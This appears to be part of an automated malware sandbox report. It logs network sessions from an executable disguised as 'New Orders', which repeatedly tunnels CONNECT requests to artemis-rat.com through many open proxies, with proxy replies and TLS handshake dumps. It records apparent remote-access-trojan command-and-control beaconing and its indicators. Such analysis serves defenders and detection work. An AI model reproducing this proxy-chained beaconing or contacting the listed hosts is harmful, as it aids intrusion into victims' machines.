                                                                                        Date: Mon, 11 Mar 2024 15:16:46 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 166
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1525192.168.2.954378147.75.34.86100087672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.440704107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.748260021 CET65INHTTP/1.1 200 Connection Established
                                                                                        Proxy-Agent: Zscaler/6.3


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1526192.168.2.95439747.91.65.2331287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.451036930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.221863031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.455622911 CET38INHTTP/1.1 200 OK
                                                                                        content-length: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1527192.168.2.95437920.206.106.19281237672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.457324028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.778630972 CET319INHTTP/1.1 403 Forbidden
                                                                                        Server: squid
                                                                                        Mime-Version: 1.0
                                                                                        Date: Mon, 11 Mar 2024 15:16:46 GMT
                                                                                        Content-Type: text/html;charset=utf-8
                                                                                        Content-Length: 17
                                                                                        X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                        X-Cache: MISS from cdn-fintech.info
                                                                                        X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                                        Data Ascii: ERR_ACCESS_DENIED


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1528192.168.2.95437345.11.95.16552137672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.466034889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.221982956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1529192.168.2.95403494.247.241.70536407672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.467139959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.954463005 CET202INHTTP/1.0 404 Not Found
                                                                                        Content-Length: 717
                                                                                        Content-Type: text/html
                                                                                        Date: Fri, 09 Feb 2024 12:21:12 GMT
                                                                                        Expires: Fri, 09 Feb 2024 12:21:12 GMT
                                                                                        Server: Mikrotik HttpProxy
                                                                                        Proxy-Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1530192.168.2.952733146.19.106.193123347672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.468451977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1531192.168.2.954072148.72.23.5632607672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.489892006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.570031881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.570450068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:58.570312977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:10.569971085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:34.570111990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:22.570044994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1532192.168.2.952820107.180.90.24876987672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.494863033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.570072889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.570450068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:58.571280003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1533192.168.2.954445192.154.246.9690007672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.511424065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1534192.168.2.95441235.72.118.126807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.519313097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.785187006 CET116INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:46 GMT
                                                                                        Server: nginx
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 0
                                                                                        Mar 11, 2024 16:16:46.804090023 CET369OUTData Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 ef 20 5e 8a 0e fe 96 ba 08 90 29 31 a5 cb 5a 2e 0f 7d 30 0f 8e bc 92 41 71 08 28 dd 74 ef 7a 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                        Data Ascii: lhe ^)1Z.}0Aq(tz*,+0/$#('=<5/artemis-rat.com#Kqk#rMHW)%-#/7:^;5siJBq}pYy
                                                                                        Mar 11, 2024 16:16:47.069312096 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 63 15 91 e0 24 f6 d3 57 9c 31 0b 07 e2 df 8e 12 68 7b 25 09 4d 1c 36 c1 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                                        Data Ascii: =9c$W1h{%M6DOWNGRD0000*H010Uartemis-rat.com0240311151251Z260311151251Z010Uartemis-rat.com0"0*H0c XY
                                                                                        Mar 11, 2024 16:16:47.527450085 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 d9 17 d6 9d 78 45 6f 6c a6 00 4a 56 20 a7 97 e8 d6 a0 a9 75 e5 dc 07 bc 1d 65 3d 46 c7 54 0e 0a 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 d3 81 7f 3c b3 d5 f4 aa de 42 aa 75 20 7e f9 84 22 31 dd 2b ce
                                                                                        Data Ascii: %! xEolJV ue=FT(<Bu ~"1+A"%S
                                                                                        Mar 11, 2024 16:16:47.792112112 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 e3 12 31 fe 40 48 21 3f 94 31 3c bc 83 81 8d 6b d7 50 02 9e c0 07 06 e5 83 40 78 48 39 5e 4a 9d dd 17 65 9a 6d 3a 1a 25
                                                                                        Data Ascii: (1@H!?1<kP@xH9^Jem:%


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1535192.168.2.954425133.18.234.13807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.526978016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.810029030 CET113INHTTP/1.1 503 Service Temporarily Unavailable
                                                                                        Content-Type: text/html
                                                                                        Connection: close
                                                                                        Data Raw: 42 61 63 6b 65 6e 64 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65
                                                                                        Data Ascii: Backend not available


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1536192.168.2.95442347.243.92.19931287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.560899019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.864696980 CET38INHTTP/1.1 200 OK
                                                                                        content-length: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1537192.168.2.95440337.187.77.58525937672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.565295935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.222060919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.149085045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.132932901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.835827112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1538192.168.2.954466104.19.217.219807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.572614908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.727026939 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:46 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1539192.168.2.954465104.22.14.48807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.572614908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.727103949 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:46 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1540192.168.2.95440247.243.205.131287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.579488039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1541192.168.2.954408201.91.82.15531287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.580010891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.892822027 CET19INHTTP/1.1 200 OK
                                                                                        Mar 11, 2024 16:17:51.088238955 CET208INHTTP/1.0 504 Gateway Timeout
                                                                                        Content-Length: 718
                                                                                        Content-Type: text/html
                                                                                        Date: Mon, 11 Mar 2024 15:14:45 GMT
                                                                                        Expires: Mon, 11 Mar 2024 15:14:45 GMT
                                                                                        Server: Mikrotik HttpProxy
                                                                                        Proxy-Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1542192.168.2.952728128.199.221.9171767672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.582612991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1543192.168.2.954404103.23.100.141457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.585591078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1544192.168.2.954389102.132.201.202807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.587440014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.034039021 CET343INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                        Date: Mon, 11 Mar 2024 15:16:46 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 182
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1545192.168.2.954438176.98.81.8580807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.598216057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1546192.168.2.95407565.21.24.81807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.600300074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.923706055 CET309INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.25.3
                                                                                        Date: Mon, 11 Mar 2024 15:15:49 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 157
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 35 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.25.3</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
